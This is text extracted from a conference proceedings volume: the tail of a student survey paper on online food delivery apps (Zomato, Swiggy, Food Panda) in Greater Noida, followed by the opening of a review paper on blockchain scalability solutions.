nials who are short of time and want instant delivery of food within few minutes,
along with the people who are food lovers and just want to have a relaxing experi-
ence in the comfort of their homes. A study has been conducted by Market Research
Future, a business consultancy firm with the title “Digital Platforms Reign in the Food
Ordering Market” (Van Alstyne et al. in Harvard Business Review, [3]). According
to this study, there are likely chances that the online food ordering market in India
will see a drastic change. This market may grow at over 16 percent annually in India
and by 2023 is likely to touch $ 17.02 billion (The online food ordering market in
India is likely to grow at over 16 per cent annually to touch USD 17.02 billion by
2023. Business Standard, [4]). This research paper will discuss two objectives. The
first objective is to discuss the consumer perception toward this new trend of online
food delivery and ordering services, and the other one is to examine the role of signif-
icant factors on Online Food Ordering Services. The survey was conducted on 216
students of four technical and management institutes in Greater Noida. The main
focus of the research is on carefully studying and analyzing the data which has been

A. Srivastava (B) · A. K. Bhatt


GL Bajaj Institute of Management and Research, PGDM Institute, Greater Noida, India
e-mail: arpita.srivastava@glbimr.org
R. Malhotra · P. Srivastava
Manav Rachna University, Faridabad, India
e-mail: radhika.malhotra@glbimr.org
P. Srivastava
e-mail: priyanka@mru.edu.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 1
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_1
2 A. Srivastava et al.

collected from all the users in Greater Noida who are using the online food ordering
apps and delivery services. Four parameters have been taken into consideration for
analyzing positioning study (perceptual mapping).

Keywords Cloud kitchen · Consumer perception · Online food delivery service ·


Mobile application · Key success factors

1 Introduction

The views of people regarding the online purchase of food are changing very fast. The
e-commerce and E-businesses, with technological advantage, are offering hassle-free
and quick food deliveries to the consumers [5]. In today’s age of advanced information
and technology, consumer perception is being molded and that too into an affirmation
toward online food delivery.
Indians have accepted the new trend of food delivery system via apps which is at
the convenience of their fingertips [6]. One of the explanations behind this new trend
may be the time constraint and hectic corporate lifestyle, which has given boost to
the online food delivery sources. Furthermore, it is the comfort of ordering food from
a variety of restaurants from mobile (Figs. 1 and 2).

2 Literature Review

Sethu and Saini (2016) in one of their papers titled “Customer Perception and Satis-
faction on Ordering Food via Internet” (with special relevancy Manipal univer-
sity) highlighted that online ordering of food saves a lot of time, thereby helping

Fig. 1 Segment overview: global segment sizes. Source Statista Digital Market Outlook (2018)
Investigation of Consumer Perception Toward Digital … 3

Fig. 2 Food delivery market and its potential [7]

the scholars to manage their time proficiently [8]. The researchers and students
have option to order their preferred food from the preferred location at preferred
time. Furthermore, the study reveals that almost all the respondents are using
Internet in their phones or computers, a significant proportion of the respondents
ordered double or a minimum of once per week. Recently, some researchers have
also discovered that the Web surroundings offer nice opportunities for interactive
and individualized selling (Burke, 2002; Wind & Rangaswamy, 2001). According
to a study as compared to offline environment, the online environment offers more
opportunities for personalized and interactive marketing. Furthermore, (Phau & Lo,
2004) states that Internet also offers an impulsive shopping channel to the consumers.
Consumers can now effortlessly search on the Web, various competitive sellers and
products that match their expectation (Singh, 2002). The social media also plays a
role in making purchase decisions. The consumers receive input and feedback from
family, friends, and also from peers via various social media channels such as Insta-
gram, public forums, Facebook, blogs, and Twitter (Herring et al., 2005; Bernoff &
Li, 2008).
The Web site quality is also considered as an important cue for customer satis-
faction [9]. Therefore, in the last decade, the markets have witnessed a drastic
change as far as literature on Web sites is concerned. It is serving as an impor-
tant factor for driving purchase intention. There are many factors which are taken
into consideration to improve the Web site quality. Some of many important factors
include customization, cultivation, choice, interactivity, care, character, community,
convenience, and user-friendliness (Srinivasan et al. 2002); Huang, 2003, also added
complexity, novelty, and interactivity. Furthermore, according to Wirtz and Lihotzky,
2003, the factors like technical integration, individualization, free services, conve-
nience, and community also play important roles. (Chiu et al. 2005) emphasized that
4 A. Srivastava et al.

data quality, interactivity and learning, connectivity playfulness (Chiu et al. 2005);
quality of the content, appearance, technical adequacy, and specific content (Liao
et al. 2006); communication, design, promotion, merchandising, privacy/ security,
and order fulfillment (Jin & Park, 2006); user-friendliness, content quality, transac-
tion speed, and security (Shih & Fang, 2006) are the essential aspects for generating
traffic on the Web site.
Other researchers are of the view that system quality, information quality, and
service quality are the three Web site merits that are expected by the customers to
assist them make online encounters (Shih, 2004).
Additionally, in the online business environment, the Web site design is considered
to be an important factor (Marcus & Gould, 2000), and therefore, the designs by the
businesses are adapted to suit the local values and norms (Gommans et al. 2001).

2.1 Trust and Security

Security and trust are crucial factor for buyers who intend to purchase products
online directly from the shopping Web sites. Because of this reason, security is
considered as one of the primary concerns by consumers who are buying online
products (Flavian et al. 2006). Furthermore, the perceived value over confidentiality
and security features of the Web sites is very important antecedents of trust, which
are responsible for influencing the behavioral intention of the consumers (Mukherjee
& Nath, 2007). Therefore, in most of the studies, security and privacy of the Web
portals of the e-commerce companies (e-service providers) are one of the primary
concerns which are addressed on priority by these companies (Sathye, 1999; Liao
& Cheung, 2002; Poon, 2008). Confidentiality, in particular, is considered to be an
important element for creating an online belief and trust in any service organization.

2.2 Web Site Design

(Garrett, 2003) clearly puts forth the concept of Web site design as something which
deals with emotional appeal, aesthetics, uniformity, poise, mix of colors, shapes,
photography, and font style. A few studies (Karvonen, 2000) suggest an association
between trust and aesthetic beauty of the Web sites, even though some of them (Wang
& Emurian, 2005) found noteworthy association between the two. In fact, most of the
empirical studies have shown the positive stance (Tarasewich, 2003), when it comes
to the relationship between Web site aesthetics and enjoyable user experience.
Investigation of Consumer Perception Toward Digital … 5

2.3 Payment System

Chen and Chang (2003) state that online shoppers have a very low tolerance for
system feedback. Yet another study says online buyers wait for only few seconds
(eight seconds) before they leave any Web site (Dellaert & Khan, 1999). As per
Weinberg, 2000, factors like loading time, appearance, and functionality are very
important for any webpage. The Web site design should be trustworthy, user-friendly,
and it should save transaction time of the consumers. The consumers may not use
the online payment system of the portal if it is loading slowly, and the design is
not trustworthy. If the Web site of the e-service provider is designed to serve the
purpose of a salesperson, in that case, the Web site should also focus on certain
skills and qualities of salespersons like expertise, likeability, and strong trust (Hawes
et al., 1989; Doney & Cannon, 1997) as these characteristics are surely linked with
trust of the consumer in the salesperson and the company. It may be noted that Web
site design, information quality, security/privacy, and payment system of that Online
Food Ordering Web site play a role in determining customer’s trust in his online
shopping experiences.

2.4 Service Quality

The factor that plays a significant role in generating customer satisfaction is service
quality. In order to measure the loyalty and customer satisfaction, the organiza-
tions are also using yet another important tool called service quality dimensions
(SERVQUAL) tool (Landrum et al., 2009). The concept of service quality dimen-
sions which came into existence in 1988 was introduced by Parasuraman et al. It
is basically a generic instrument which is used for the measurement of service
quality based on the focus group’s inputs. The concept has also been adopted by
many organizations like Web services and libraries (Gede & Sumaedi, 2013; Reichl,
Tuffin & Schatz, 2013; Wang et al., 2014) [10]. According to Juran and Godfrey
(1999), quality is defined as “fitness for use” and “those product features which meet
customer needs and thereby provide customer satisfaction”. However, depending
on the methods of approach driven to transcendental experience, value, manufac-
ture, product, and user, the definition of quality may vary (Gravin, 1984). Rolland
and Freeman (2010) have included the following factors in the concept of service
quality: purchasing of products and services, Web site facilitating effective and effi-
cient shopping, and the type of customer service delivered right from first contact to
fulfillment of the services. Moreover, according to Juga et al. (2010) while service
perceptions influence loyalty, Oliver, 1997, believes that satisfaction represents a
more general evaluative construct than the episodic and transaction-specific nature
of service performance, which mediates linking service quality and a customer’s
re-purchase loyalty (Olsen, 2002). Providing excellent service to the consumers is
6 A. Srivastava et al.

the key sustainable strategy for e-commerce and online food delivery and compa-
nies. Therefore, online food delivery companies focus more on the perceived quality
of the service, as the good quality service always has a larger impact on customer
satisfaction.
The three major dimensions, on the basis of the above discussions, have been
recognized as crucial for retaining and satisfying the consumers. They are delivery,
quality of food, and customer service.

2.5 Delivery

On-time delivery of products is very essential in today’s e-commerce environment


[11]. It plays a very important role in retaining and satisfying the new and the existing
customers. According to Dholakia and Zhao (2010), on-time delivery has a strong
impact on the relationship between online store features and customer satisfaction
[12]. There will always be a negative impact on customer satisfaction if there is a
delay in delivery of food or products beyond the committed time (e.g., guaranteed
30 min delivery by some service providers or within one-hour delivery).
Moreover, according to (Dholakia & Zhao, 2010), delivery has an important posi-
tive impact on customer satisfaction. On-time delivery is one of the important order
fulfillment variables that dominates the effects on overall customer satisfaction and
evaluations. Hence, it may be noted that an overall customer satisfaction and loyalty
of consumers in online food delivery business are influenced by on-time delivery.

2.6 Customer Service

Consumers’ perception regarding the organization’s customer service support has a


big correlation with possibility of re-purchase (Reibstein, 2002). According to Posselt
and Gerstner (2005), consumer satisfaction with a service will be influenced by the
sequence of service encounters. The customer ratings about the services also play a
role on the purchase decision. The poorly rated Web sites are likely to be ignored
by the buyers. Suleyman (2010) findings also echoed the same trend. He observed
that overall online customer satisfaction is dependent on the service quality [13].
Yet another concern of the online consumers is the problem of replacements and the
resolution time of their queries and issues by customer service team. The result of
this research is in line with earlier researchers (Selnes, 1998; Wiertz et al., 2004)
despite a significant debate about the causal ordering between service quality and
satisfaction. Results highlighted that quality of service is a very important anecdote
of satisfaction.
Investigation of Consumer Perception Toward Digital … 7

2.7 Food Quality

The food quality is seen to be associated with satisfaction in fast-food restaurants


(Law et al., 2004; Kivela et al., 1999). Though some may argue that food cannot be a
part of service quality, it focuses on the features like well-cooked, healthy, fresh, and
nicely presented food. These are some of the factors that can influence the customers’
satisfaction and their decisions to re-purchase. According to this observation (Kotler,
1991), service also means the benefits or an intangible activity provided by the service
providers to customers, which can be a tangible product and something that is added
to intangible service, or in an independent form.
According to earlier researchers, there are three important factors having a direct
and positive relationship with satisfaction (Qin et al., 2010) [14]. They are food
quality, perceived value, and service quality. In addition, studies conducted by (Para-
suraman et al. 1994; Andaleeb & Conway, 2006) have reported that the quality and
price of the product along with service quality have a larger impact on customer satis-
faction. In addition (Kivela et al., 1999; Law et al., 2004) stated that many studies
which were conducted on fast-food restaurants have shown that quality of food has
a relation with customer satisfaction and it was tested as a possible determinant of
customer satisfaction. It is expected that, in this study as well, there will be a major
relationship between quality of food and customer satisfaction. Hence, it is very
important for the food delivery companies to maintain their food quality as it is one
of the important factors to create customer satisfaction.

2.8 Objectives of the Study

The main objectives of the study are given below.


• To observe consumer perception (here the students) of online food delivery and
ordering services and key success factors of online food delivery services at
Greater Noida in five technical and management institutes
• To study the student’s perception toward the online food delivery and ordering
services
• To examine the key factors influencing online food ordering services in Greater
Noida.

3 Scope of Study

The most important aim of this study as mentioned above is to know and understand
the consumer perception about the online food delivery and ordering services in
Greater Noida. The study will help us in understanding the “Online Food ordering
and Delivery Service Market”. With this study, we will understand the consumer
8 A. Srivastava et al.

perception and key success factors regarding the services various companies provide
in Greater Noida.
Consequently, the findings of this study may also be useful for the online food
delivery companies (online service providers) who after analyzing the results can
work upon on these variables and try to fill up the gaps in the mindset of consumers.

4 Research Methodology

Primary data sources of this study include information collected and processed
directly by the researchers, through questionnaire based on perception of customers
and key success factors for usage of online food delivery apps in Greater Noida.
Secondary data collection includes information from various apps, Internet, jour-
nals, magazines, and research reports. Investigation and observation of the collected
data wer done with the help of computational, mathematical, and statistical tools and
techniques. A well-designed and structured questionnaire with both open-ended and
close-ended questions was prepared.
Questionnaire: The section I of the questionnaire had relevant questions related to
demographic factors like gender, age, and university/college of the students who
willingly accepted to fill the form.
Second section of the questionnaire sheds light on the questions about students’
experience while ordering online food and about the factors affecting their buying
behavior.
Sample Size: 216 respondents (Students).
Research Tools: Following are the research tools which are used to draw conclusions
and to do analysis.
• Cronbach alpha
• Chi square
• Weighted average
• Descriptive analysis multi-item scales (five-point, Likert type) ranging from
strongly agree (5) to strongly disagree (1) are used.

Sampling:
Survey was conducted in four technical and management institutes in Greater Noida.
Non-probability: Convenience sampling method was used.

Hypothesis: H0: No internal consistency exists among the four factors considered
for the usage of online food delivery app.

H1: There exists an internal consistency among the four factors considered for
the usage of online food delivery app.
Investigation of Consumer Perception Toward Digital … 9

5 Analysis and Interpretation

Table 1 is presented to understand the behavior of students about the use of online
food delivery apps, and socioeconomic characteristics of the consumers were studied.
These variables are taken into consideration as they affect the consumption pattern
and consumer behavior regarding the usage of food delivery apps. Students were
asked to fill the questionnaire. The demographic profile of the respondents is
represented in the following table.
Users—Food delivery and ordering services apps (Graph 1; Fig. 3):
Interpretation: Analysis of the data shows that 87% of the respondents were using
services of online apps for ordering online food. There were total respondents 216

Table 1 Demographic profile


Variables No. of Percentage (%)
respondents
Gender
Male 118 55%
Female 98 45%
Total 216 1
Age
20–25 Years 185 86%
25–30 Years 27 12%
30–35 Years 3 2%
35 years and 1 0
above
Total 216 100
Profession
Self Employed 17 8%
Students (Not 177 82%
Working)
Working 22 0
Total 216 100
Expenditure in a month (food ordering)
Less than 1000 26 12%
1000–1500 95 44%
1500–2000 43 20%
2000–2500 29 13%
More than 23 11%
2500
Total 216 100
10 A. Srivastava et al.

Fig. 3 Perceptual mapping (Number of restaurants and speed of delivery)

Graph 1 Usage of online


food ordering and delivery
apps

respondents, and 189 of them were using the online services. However, 27 respon-
dents (13%) revealed that they are not very keen and are not using the online services
for food delivery.

5.1 Perceptual Map

It is basically a diagrammatic technique used by marketers in order to show the


customers’ perceptions or potential customers for different factors. We have used two
major factors (Number of restaurants available and speed of delivery) to understand
the positioning of various brands on the mind of customers.
Investigation of Consumer Perception Toward Digital … 11

Interpretation:
Above analysis clearly depicts that Zomato has strong position in terms of providing
“Availability of Restaurants” and “Highest Speed of Delivery” in Greater Noida.
Position of Swiggy is good in both the parameters. Food Panda has good positioning
on delivery, but for discount, its position is average. Uber Eats needs to evolve in this
area as Zomato, Swiggy, and Food Panda are the prominent players in the market in
Greater Noida.

5.2 Usage of Food Delivery and Ordering Apps

Usage
of Apps Number Percentage (%)
Zomato 127 68%
Food Panda 32 17%
Swiggy 25 14%
Uber Eats 5 1%
Total 189 100

Conclusion from the above analysis: We can clearly analyze that Zomato is the
most preferred app followed by Food Panda and Swiggy.

5.3 Factors Affecting Usage of the Food Delivery Apps

Interpretation:
From the above graph, we can analyze that for Zomato its user-friendly app acts
as a major factor for influencing the usage followed by 24*7 availability. For Food
Panda, customers prefer its app for the discount being offered by them other than
their user-friendly app and 24*7 availability (Graph 2).
Chi-squared test between factors:
Four factors considered during analysis are as follows:
12 A. Srivastava et al.

Graph 2 Major factors and its effect on the usage of food delivery apps

• User-friendly app
• 24*7 availability
• Mode of payment
• Discount offered.

Reliability test
Cronbach’s alpha * Cronbach’s alpha on the given items Number of items (N)
0.852 0.851 4

The item has an alpha coefficient of 0.852, which suggests that the item has a
relatively high internal consistency among four factors.
Findings
Zomato has strong position in the mind of consumers on the factor of highest
“Speed of Delivery” and “No. of Restaurants available”. The strong perception of
the consumer toward speed of delivery is the reason why majority of respondents
decide to choose Zomato over the other apps in Greater Noida.
• Swiggy and Food Panda do not have clear positioning around these factors. They
can map their position on any other factor such as “Discounts Offered” where
Zomato is not preferred choice.
• Uber Eats needs to work hard to expand their market in Greater Noida region and
achieve better responses in near future.
• Zomato is the preferred choice when it comes to online food delivery followed
by Swiggy and Food Panda.
• Consumer preferred Zomato because of its user-friendly app, 24*7 availability,
and easy mode of payment.
Investigation of Consumer Perception Toward Digital … 13

6 Conclusion

Greater Noida (Knowledge Park) is the center of educational institutions where


students are busy in their academic engagements. Online food ordering and delivery
help students in managing their time better. Food delivery applications have turned
into a major hit among students who have easy access to Internet, and 44% of the
samples spend Rs 1000–1500 per month on food via online food delivery service
providers.
According to the study, the market of online food ordering services is growing by
leaps and bound. The students are well versed with the apps available in the market
for instant food delivery. Zomato holds strong position in the mind of consumers
and is the most preferred brand despite not offering any discounts to consumers.
Food Panda and Swiggy are preferred because of the discount offer, but to be in the
race in near future, they need to focus on improving their service delivery, number of
restaurants available, and user-friendly application. The user-friendly apps where the
orders can be placed easily are liked by millennial community. However, the major
challenge lies for the company as how to attract more students as a consumer and to
provide the ease of usage of delivery apps.

References

1. Mustafa, A. B., Balihallimath, H., Bidichandani, N., & Khond, P. M. (2016). Growth of food
tech: A comparative study of aggregator food delivery services in India. In Proceedings of
the 2016 International Conference on Industrial Engineering and Operations Management
Detroit, Michigan, USA, September 23–25, 2016.
2. PTI. (2019, April 1). Zomato expands food delivery business to 213 cities across India.
Economics Times. Retrieved from https://economictimes.indiatimes.com/small-biz/startups/
newsbuzz/zomato-expands-food-delivery-business-to-213-cities-across-india/articleshow/
68672719.cms
3. Van Alstyne, W., Geoffrey, P. G., & Choudary, S. P. (2016). Pipelines, platforms, and the new
rules of strategy. Harvard Business Review, April 2016, 4–6.
4. The online food ordering market in India is likely to grow at over 16 per cent annually to
touch USD 17.02 billion by 2023. Business Standard. Retrieved from https://www.business-
standard.com/article/pti-stories/online-food-ordering-market-may-grow-at-over-16-pc-likely-
to-touch-usd-2023
5. Thyagaraja, G. (2015). Zomato—A case study. International Journal of Business and
Administration Research Review, 3(11), 157–160.
6. Gupta, M. (2019). A study on impact of online food delivery app on Restaurant Business special
reference to Zomato and Swiggy. Retrieved from http://ijrar.com/upload_issue/ijrar_issue_205
42895.pdf
7. McKinsey & Company. (2016). The changing market for food delivery. Retrieved from https://
www.mckinsey.com/industries/high-tech/our-insights/the-changing-market-for-food-delivery
8. Sethu, H.S., &, Saini, B. (2016) Customer perception and satisfaction on ordering food via
internet, a case on Foodzoned.Com, in Manipal. In: Proceedings of the Seventh Asia-Pacific
Conference on Global Business, Economics, Finance and Social Sciences (AP16Malaysia
Conference) ISBN: 978-1-943579-81-5. Kuala Lumpur, Malaysia. 15–17, July 2016. Paper
ID: KL631.
14 A. Srivastava et al.

9. Bhargave, A., Jadhav, N., Joshi, A., Oke, P., & Lahane, S. R. (2013). Digital ordering system
for Restaurant using Android. International Journal of Scientific and Research Publications,
3(4), April 2013.
10. Gede, M.Y.B.I., & Sumaedi, S. (2013). An analysis of library customer loyalty: The role of
service quality and customer satisfaction, a case study in Indonesia. Library Management,
34(6/7), 397–414.
11. Rathore, S., & Chaudhary, M. (2018). Consumer perception on online food ordering.
International Journal of Management & Business Studies, 8(4), Oct–Dec 2018, 12–17.
12. Dholakia, R.R., & Zhao, M. (2010). Retail web site interactivity: how does it influence customer
satisfaction and behavioural intentions?. International Journal of Retail & Distribution
Management, 37(10), 821–838.
13. Barutçu, S. (2010). E-Customer satisfaction in the e-tailing industry: an empirical survey for
turkish e-customers. Ege Akademik Bakis (Ege Academic Review), 10(1), 15–15.
14. Qin, H., Prybutok, V. R., & Zhao, Q. (2010). Perceived service quality in fast-food restaurants:
Empirical evidence from China. International Journal of Quality & Reliability Management,
27(4), 424–437.
A Systematic Review of Blockchain
Technology to Find Current Scalability
Issues and Solutions

Bhargavi K. Chauhan and Dhirenbhai B. Patel

Abstract Blockchain technology has proven the success of its security technology
and need for transparency of transaction in the present area. This paper covers
in-depth review of all the existing blockchain technology with its issue, limits
throughput, high latency, storage issues, etc. Blockchain technology having different
variants with different consensus mechanisms, methods, and techniques each have its
own advantage and limitation. In this research review, we also study different existing
solutions for the scalability challenge. There are large number of blockchain scala-
bility solutions are exist but to overcome completely, it requires further research and
more number of scalability solutions.

Keywords Blockchain · Bitcoin · Ethereum · Scalability

1 Introduction

Bitcoin, the first application of blockchain technology, is one platform based on peer-
to-peer network architecture used for exchanging cryptocurrency without third party
which has given effective solution for double-spending problem. In decentralized
network, bitcoin adopted proof of work (PoW) consensus mechanism for verifica-
tion of new transactions and blocks [1]. Many digital currencies take place before
bitcoin but they come with some challenges and are also not popular like bitcoin.
Digital currencies in their initial phase had many problems but out of them one most
affecting challenge was double-spending problem. Satoshi Nakamoto settled this
problem by using peer-to-peer distributed network and computational mechanism
that generate the proof of every transactions which can never be changed and remains

B. K. Chauhan (B) · D. B. Patel


Department of Computer Science, Gujarat Vidyapith, Ahmedabad, Gujarat 380014, India
e-mail: 11908903.gvp@gujaratvidyapith.org
D. B. Patel
e-mail: dhiren_b_patel@gujaratvidyapith.org

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 15
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_2
16 B. K. Chauhan and D. B. Patel

in chain forever. Each transaction contains two mandates for completion, one is digi-
tally signed hash by previous transaction and second is public key of the next owner.
State transition system is used in bitcoin ledger to preserve the ownership status of
present bitcoin where new state is output of state transition function. Each transaction
contains input hash and output hash where output hash of the transaction is used only
once as an input in the entire blockchain. If the output of the transaction has not been
referenced before, it is called an unspent transaction output (UTXO), and referenced
transaction is called a spent transaction output (STXO). Bitcoin presented proof of
work (incrementing a nonce to produce a hash of block) based on SHA 256 hash algo-
rithm for verification of transactions. A block of bitcoin has Merkle tree of transaction
hash [2]. Ethereum is modified and improved platform of blockchain technology after
bitcoin. It is an open-source platform, and different ecosystem can build decentral-
ized applications by using this platform. The unique and very special qualities of
blockchain technology emerged to the technology world by Ethereum platform. It
introduced proof of stake (PoS) consensus mechanism which is more efficient and
low-cost mechanism compared to PoW used in bitcoin. Ethereum created a smart
contracts concept, contains description of rules and regulations that take place on the
blockchain and executed only if rules prescribed in it are satisfied. Ethereum virtual
machine (EVM) executes all smart contracts and no changes would be possible after
smart contract accepted by blockchain. Ethereum platform used Ether as its currency.
The transaction verification takes place by PoS consensus mechanism which modi-
fied the Greedy Heaviest Observed Subtree (GHOST) protocol and consists Keccak
256-bit hash algorithm [2, 3].
Blockchain technology has power to be transparent in the procedure from buying
and selling fresh vegetables to interaction with the government where consensus
mechanism will use to verify authenticity. The blockchain records are stored in
ledger by cryptographic method, and it is traceable and tamper-free [4]. It is not
limited to only cryptocurrency but also reshaped technology world with its specific
features. This technology can convert existing centralized system into more accurate,
secure, and decentralized system [5]. The unique side of this technology is crypto-
graphically secured, transparent, anonymity, auditable, and data integrity without
any third party and that creates the interest on research areas. It did not grow as it
should have grown, because of its technical and legal limitations. Some limitations
are limited scalability, high latency, storage constraints, limited consensus mecha-
nisms, lack of governance, high energy consumption, inadequate tooling, and threat
of quantum computing [6–8]. Bitcoin and smart contract are innovation of blockchain
technology but can process limited number of transactions, and the “blockchain scal-
ing” introduced the third innovation of blockchain technology [9]. Blockchain tech-
nology has Blockchain 1.0 (bitcoin), Blockchain 2.0 (Ethereum), and Blockchain
3.0 (trying to solve challenges of blockchain by different solution techniques) gener-
ations [10]. The decentralization, security, and scalability are three important pillars
of blockchain technology and are called trilemma in blockchain. The scalability
is an important pillar that affects the growth of blockchain technology most [11].
Bitcoin and Ethereum process the limited number of transaction but its popularity
A Systematic Review of Blockchain Technology to Find Current … 17

has been increased as it includes unique features. After bitcoin and Ethereum, the
next generation is trying to solve the limitations of blockchain technology.

2 Scalability Problem Understanding

Block size of bitcoin is only 1 MB, and it can handle less than 7 tps (transactions
per second). Payment network visa can achieve 47,000 tps and in present situation it
handles hundreds of millions of transactions per day. Suppose size of one transaction
is 300 bytes and bitcoin want to achieve visa level, it would require a throughput
of 8 GB, which would reach to 400 TB of data per year. With this storage capacity,
bitcoin network would support only few nodes that lead centralized network, and
it is completely opposite to decentralized network concept [2]. Bitcoin can process
3–7 tps (transactions per second) with 1 MB block size, and it takes 10 min to mine a
single block. Ethereum handles 15–20 tps [9] but both seen very poor when compared
with visa payment network [12]. The performance of blockchain scalability can be
measured by several key matrices like maximum transactions per second, minimum
confirmation time, and cost per confirmed transaction (CPCT) [13]. The performance
matrices are divided into two categories with different requirements. The categories
are the overall performance metrics for the users and the detailed performance metrics
for the developers. The overall performance matrices for the users include transaction
per second, average response delay, transaction per CPU, transaction per memory
second, transaction per disk I/O, and transaction per network. The detailed perfor-
mance matrices for the developers include peer discovery rate, response rate, trans-
action propagating rate, contract execution time, state updating time, and consensus
cost time [14]. Out of all these performance matrices, the throughput and latency are
the most important matrices that directly influence the users [15].

3 How Design of Blockchain Affect Scalability

The ledger type is one parameter that affects the blockchain scalability. Based
on ledger type, architecture of blockchain divided into three parts: single ledger,
multiledger, and interoperability. Ethereum is single-ledger-based public network
platforms. Chain core, Hyperledger Burrow, Hyperledger Sawtooth, Hydrachain,
Hyperledger Iroha, Burst, NEM, BigchainDB, and MultiChain are single-ledger-
based private network platforms. Quorum and Credits are single-ledger-based hybrid
network platforms. Hyperledger Fabric and Oracle are multiledger-based private
network platforms. Elements, Lisk, and Openchain are interoperability-based private
network platform [6]. The leader election and transaction serialization plays impor-
tant role in block generation process. The leader election uses three types of mech-
anisms fixed leaders, a single leader and collective leaders. Hyperledger Fabric has
fixed set of leader nodes that run the PBFT consensus protocol. In Bitcoin-NG, a
18 B. K. Chauhan and D. B. Patel

single leader is selected through PoW, and selected leader verifies the transaction until
new leader is not selected. ByzCoin and Solida use committee election or collec-
tive leader nodes mechanism to reduce the confirmation time [11]. The network
type, leader election mechanism, and ledger type affect the transaction verification
process. In public network, a large number of nodes verify the transaction. While
in private and consortium network, only permissioned or limited number of nodes
verify the transactions. Limited or selected number of nodes complete the transaction
verification process faster compared to large number of nodes.

4 Solutions to Scale Blockchain

The blockchain scalability solution is categorized into three different layers Layer
0, Layer 1 (On-chain), and Layer 2 (off-chain). The solution of each layer is divided
into different solution categories [15].

4.1 Layer 0

Layer 0 is having data propagation solutions like Erlay, Kadcast, Velocity, and
bloXroute. It needs improvement in existing protocols as well as required more
solutions.

4.2 Layer 1 (On-chain) Solutions

The block data category is having solutions like SegWit, Bitcoin-Cash, Compact
block relay, Txilm, CUB, and Jidar [15]. Big Block solution can increase throughput
and solve some cost issue but it also increases probability of orphan blocks and
ultimately increases maintenance cost of chain [16]. The digital signature takes up
65% of the transaction space. SegWit solution stores the digital signature outside
of the block to increase tps. It reduces the transaction size by storing the digital
signature separately from block. Increasing the size of block means more transac-
tions per block and is useful to improve performance of blockchain scalability [9].
Segregated Witness (SegWit) also improves the throughput and minimizes the cost
but it increases code complexity and also takes more time to process the transaction
[16]. The consensus category has solutions like Bitcoin-NG, Algorand, Snow white,
and Ouroboros. Ouroboros can process 257.6 tps with 2 min confirmation time, and
Algorand can handle 875 tps with 22 s. This improves the throughput but it cannot
solve scalability challenge completely and it needs more solutions [15]. The sharding
category has solutions like Elastico, OmniLedger, RapidChain, and Monoxide [15].
A Systematic Review of Blockchain Technology to Find Current … 19

Sharding technique has parallel transaction verification mechanism that many trans-
actions verified at a same time which improves performance of the system. Zilliqa
is one solution using sharding method to improve performance and handles 1800
nodes with 1218 tps. It cannot give complete solution to scaling the blockchain but
it shows improvement when compared with Ethereum. Ethereum can handle 25,000
nodes with 15–20 tps [9]. Sharding technique uses parallel processing of transaction
which increases the throughput. This technique is also facing some challenges like
any attacker may take control on single shard then the data integrity is broken which
means 1% attack [16].
The directed acyclic graph (DAG) category has solutions like Inclusive, Spectre,
Phantom, Conflux, Dagcoin, IOTA, Byteball, and Nano. All these solutions try
to overcome scalability problem of blockchain, but are not enough to blockchain
completely scalable. This method has some limitations, and to overcome that chal-
lenges, it needs some more solutions [15]. Some solutions are using DAG method; one
of them is Tangle developed by IOTA is lightweight solution which does not contain
full copy of ledger. Bramas, Byteball, and Holochain are also based on DAG-based
solutions [17]. DAG and blockchain both storing the transactions in an open ledger.
The ledger maintaining method is different in both the approaches. The ledger of
blockchain has blocks that contain headers and transactions. On the other side, DAG
is storing the account’s transaction/balance history only. All network nodes are veri-
fying the transactions in blockchain-based platform. While in DAG-based platform,
transaction is valid if majority votes are in favor of that transaction. Decreasing block
size is the main approach of DAG technique. Many solutions use this method to scale
blockchain, and large number of investigations is going on but successful investiga-
tion does not prove yet [12]. DAG-based solutions have ledger security issues, and
decentralization of this technique is debatable which may prevent its growth [17].

4.3 Layer 2 (Off-chain) Solutions

The payment channel category having solutions like lightning network, DarcMatter
Coin (DMC), Raiden Network, and Sprites [15]. Lightning network has almost no
transaction fee and waiting time. It increases throughput and also minimizes the cost,
but it is the solution for payment channels with small amount of transactions. It cannot
process large payments and variety of transactions [16]. The Side-Chain category
having solutions like Pegged Sidechain, Plasma, and Liquidity Network [15]. Plasma
chain uses parent–child structure, that also improves the throughput but verification
of transaction is very expensive in parent–child structure [16]. The Cross-Chain
category has solutions like Cosmos and Polkadot [15]. The Off-Chain computation
category has solutions like Truebit and Arbiturm. All protocols or solutions are trying
to solve scalability challenge but all are facing some problems, and to solve their
limitations, they need more solutions [15].
20 B. K. Chauhan and D. B. Patel

4.4 Consensus Mechanisms

Different consensus mechanisms are introduced to solve blockchain scalability


problem after proof of work (PoW) and proof of stake (PoS). According to
requirement, multiple types of protocols have been developed.
Some consensus mechanisms are Delegated Proof of Stake (DPoS), Practical
Byzantine Fault Tolerance (PBFT), Delegated Byzantine Fault Tolerance (DBFT),
Federated Byzantine Agreement (FBA), Proof of Authority (PoA), Proof of Capacity
(PoC), Proof of Participation (PoP), Proof of Stake Velocity (PoSV), Proof of Burn
(PoB), Proof of History (PoH), Proof of Importance (PoI), Proof of Believability
(PoBelievability), Proof of Elapsed Time (PoET), and Proof of Activity (PoA) [6,
15, 17, 18]. The platforms of blockchain technology are categorized into permis-
sionless network, permissioned network, and consortium network (combination of
permissionless and permissioned network).
Table 1 shows the list of platforms that use one or more consensus mechanism
and different types of architecture that try to reduce blockchain scalability challenge
according to requirement of their application [19–22].

Table 1 Blockchain platforms using different network, architecture and consensus mechanism
Platform Network type Architecture Consensus mechanism tps
Bitcoin Public Single chain PoW – – 7 tps
Ethereum Public Single chain PoW PoS – 15–20 tps
Hyperledger Private/Consortium Single chain PoET PBFT – 3500 tps
R3 corda Private/Consortium Single chain PBFT – – 15–1678 tps
Achain Public Parallel chain PoW PBFT PoS 1000 tps
Nxt Public/Consortium Single chain PoS – – 100 tps
Blockchain
Ardor Public/Consortium Parent–child PoS – – –
chain
Chain Core Private/Consortium Single chain PoA – – –
EOS Private – PoS PBFT – 3996 tps
IOTA Tangle Public DAG PoW – – 100–140 tps
